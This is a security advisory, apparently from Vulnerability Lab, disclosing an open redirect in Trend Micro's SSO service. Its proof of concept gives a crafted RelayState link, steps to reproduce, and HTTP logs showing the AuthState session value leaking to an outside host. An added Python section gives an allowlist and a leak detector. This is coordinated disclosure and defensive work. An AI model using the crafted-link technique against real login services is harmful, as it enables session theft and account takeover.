TrendMicro SSO Redirect / Session Theft
Posted on 31 March 2016
Document Title:
===============
Trend Micro (SSO) - (Backend) SSO Redirect & Session Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1694

Trend Micro ID: 1-1-1035080936

Release Date:
=============
2016-03-31

Vulnerability Laboratory ID (VL-ID):
====================================
1694

Common Vulnerability Scoring System:
====================================
6.5

Product & Service Introduction:
===============================
Trend Micro Inc. is a global security software company founded in Los Angeles, California with global headquarters in Tokyo, Japan, and regional headquarters in Asia, Europe and the Americas. The company develops security software for servers, cloud computing environments, and small business. Its cloud and virtualization security products provide cloud security for customers of VMware, Amazon AWS, Microsoft Azure and vCloud Air. Eva Chen serves as Trend Micro's chief executive officer, a position she has held since 2005 when she succeeded founding CEO Steve Chang. Chang serves as chairman of Trend Micro.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Trend_Micro )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a redirect and session web vulnerability in the official Trend Micro SSO online service web-application.
Vulnerability Disclosure Timeline:
==================================
2016-01-28: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-01-29: Vendor Notification (Trend Micro Security Team)
2016-02-02: Vendor Response/Feedback (Trend Micro Security Team)
2016-03-16: Vendor Fix/Patch (Trend Micro Developer Team)
2016-03-20: Security Bulletin (Trend Micro Security Team) [Acknowledgements]
2016-03-31: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Trend Micro
Product: Account System - (Web-Application) 2016 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A redirect issue with information leakage has been discovered in the official Trend Micro online-service web-application. The vulnerability allows an attacker to send a crafted link to the victim. Opening the link (which requires a login) discloses information to the attacker's web server; in this case the AuthState value is leaked.

The vulnerability is located in SSOService.php. A remote attacker is able to craft a link by modifying the RelayState parameter to point at his own web server. After the victim clicks the link, the website asks him to log in. After the login the victim is quietly redirected to that web server. The preceding request includes the new AuthState in the GET request, which includes the user's session. The AuthState is afterwards exposed in the Referer header. The attacker can use the AuthState value to take over the account session.

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without a privileged web-application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Send the victim the link https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US
2. The victim will be redirected to yahoo
3. The AuthState code will be cached in the Referer on the attacker's website ... like on yahoo
4. Successful reproduce of the vulnerability!

--- PoC Session Logs [POST & GET] ---

GET https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html]
Request Headers:
  Host[sso1.trendmicro.com]
  User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate, br]
  Cookie[(tracking and SimpleSAML session cookie values omitted)]
  Connection[keep-alive]
Response Headers:
  Date[Fri, 29 Jan 2016 12:20:22 GMT]
  Server[Apache/2.2.15 (CentOS)]
  Strict-Transport-Security[max-age=63072000; includeSubdomains; preload]
  X-Frame-Options[SAMEORIGIN]
  x-content-type-options[nosniff]
  Connection[close]
  Transfer-Encoding[chunked]
  Content-Type[text/html; charset=UTF-8]

POST https://account.trendmicro.com/signin/module.php/tmsaml/sp/saml2-acs.php/myaccount-sp
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[368] Mime Type[text/html]
Request Headers:
  Host[account.trendmicro.com]
  User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate, br]
  Referer[https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US]
  Cookie[(tracking and SimpleSAML session cookie values omitted)]
  Connection[keep-alive]
Post Data:
  SAMLResponse[(base64-encoded signed SAML response omitted)]
  RelayState[https%3A%2F%2Fyahoo.com%2Fmy_account%2F]
Response Headers:
  Date[Fri, 29 Jan 2016 12:20:24 GMT]
  Server[Apache]
  Set-Cookie[SimpleSAMLAuthToken=_d3a3368aeec333b95a3983ed8eb76342a58992e21d; path=/; httponly]
  Location[https://yahoo.com/my_account/]
  Pragma[no-cache]
  Cache-Control[no-cache, must-revalidate]
  Vary[Accept-Encoding]
  Content-Encoding[gzip]
  X-Frame-Options[SAMEORIGIN]
  Content-Length[368]
  Connection[close]
  Content-Type[text/html; charset=UTF-8]

GET https://yahoo.com/my_account/
Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Content Size[382] Mime Type[text/html]
Request Headers:
  Host[yahoo.com]
  User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate, br]
  Referer[https://sso1.trendmicro.com/signin/module.php/myaccount/loginuserpass.php?AuthState=_d78a8d5cb1b42574c7b94deeb9d15199caf5781311%3Ahttps%3A%2F%2Fsso1.trendmicro.com%2Fsignin%2Ftmsaml%2Fidp%2FSSOService.php%3Fspentityid%3Dmyaccount-sp%26cookieTime%3D1454068202%26RelayState%3Dhttps%253A%252F%252Fyahoo.com%252Fmy_account%252F]
  Cookie[B=]
  Connection[keep-alive]
Response Headers:
  Date[Fri, 29 Jan 2016 11:52:31 GMT]
  Via[https/1.1 ir6.fp.ne1.yahoo.com (ApacheTrafficServer)]
  Server[ATS]
  Location[https://www.yahoo.com/my_account/]
  Content-Type[text/html]
  Content-Language[en]
  Cache-Control[no-store, no-cache]
  y-trace[BAEAQAAAAAAmoBYDWfT3qwAAAAAAAAAAbpfxk8XLzrgAAAAAAAAAAAAFKnerkc.NAAUqd6uR22UgXJ6WAAAAAA--]
  Content-Length[382]
  X-Firefox-Spdy[h2]

Security Risk:
==============
The security risk of the session web and redirect vulnerability in the Trend Micro SSO online service web-application is estimated as high. (CVSS 6.5)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] – Hadji Samir [Evolution Security GmbH] [http://www.vulnerability-lab.com/show.php?user=Hadji%20Samir]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
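As an added example (not code from the advisory, from Trend Micro or from SimpleSAMLphp), the following Python shows the defensive side of the RelayState issue described in the Technical Details and PoC sections: a strict allowlist check for the RelayState return URL that rejects the PoC's yahoo.com value and common bypass shapes, and a detection pass over constructed log lines in the advisory's header-log style that flags requests whose Referer carried an AuthState to an off-allowlist host. ALLOWED_ORIGINS and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical allowlist of service-provider return origins (assumed values,
# not taken from the Trend Micro deployment).
ALLOWED_ORIGINS = {"account.trendmicro.com", "sso1.trendmicro.com"}

def relay_state_is_safe(relay_state, allowed=ALLOWED_ORIGINS):
    """Accept a RelayState only if it is an absolute https URL whose host is
    exactly an allowed origin. Rejects other schemes, scheme-relative //host,
    userinfo tricks (https://good@evil), look-alike hosts (good.evil.example)
    and double-encoded values."""
    if not relay_state or len(relay_state) > 2048:
        return False
    decoded = unquote(relay_state)          # the IdP acts on the decoded value
    if unquote(decoded) != decoded:         # double encoding: refuse
        return False
    if "\\" in decoded or any(c in decoded for c in " \t\r\n"):
        return False                        # browser/parser disagreement tricks
    try:
        parts = urlsplit(decoded)
    except ValueError:                      # e.g. malformed IPv6 literal
        return False
    if parts.scheme != "https" or parts.username is not None:
        return False
    return (parts.hostname or "").lower() in allowed

# Constructed sample lines in the advisory's header-log style: a request to an
# allowed host, the leaking request shape from the PoC, and an unrelated request.
SAMPLE_LOG = [
    "GET https://account.trendmicro.com/signin/ Referer[https://sso1.trendmicro.com"
    "/signin/module.php/myaccount/loginuserpass.php?AuthState=_aaaa%3Ahttps%3A%2F%2Fsso1.trendmicro.com%2F]",
    "GET https://yahoo.com/my_account/ Referer[https://sso1.trendmicro.com"
    "/signin/module.php/myaccount/loginuserpass.php?AuthState=_bbbb%3Ahttps%3A%2F%2Fsso1.trendmicro.com%2F]",
    "GET https://yahoo.com/ Referer[https://www.example.org/]",
]
LOG_RE = re.compile(r"^GET (\S+) .*?Referer\[([^\]]+)\]")

def find_auth_state_leaks(lines, allowed=ALLOWED_ORIGINS):
    """Return off-allowlist request targets whose Referer carries an AuthState
    parameter, i.e. requests that exposed the login-state token to a third party."""
    leaks = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target, referer = m.groups()
        if (urlsplit(target).hostname or "").lower() in allowed:
            continue
        if "AuthState" in parse_qs(urlsplit(referer).query):
            leaks.append(target)
    return leaks

if __name__ == "__main__":
    print(relay_state_is_safe("https%3A%2F%2Fyahoo.com%2Fmy_account%2F"))  # False
    print(find_auth_state_leaks(SAMPLE_LOG))  # ['https://yahoo.com/my_account/']
```

The same allowlist check applies to any return-URL style parameter the IdP redirects to after login; a Referrer-Policy of no-referrer on the login page would additionally stop the AuthState from leaving the origin even if a redirect slipped through.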
We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com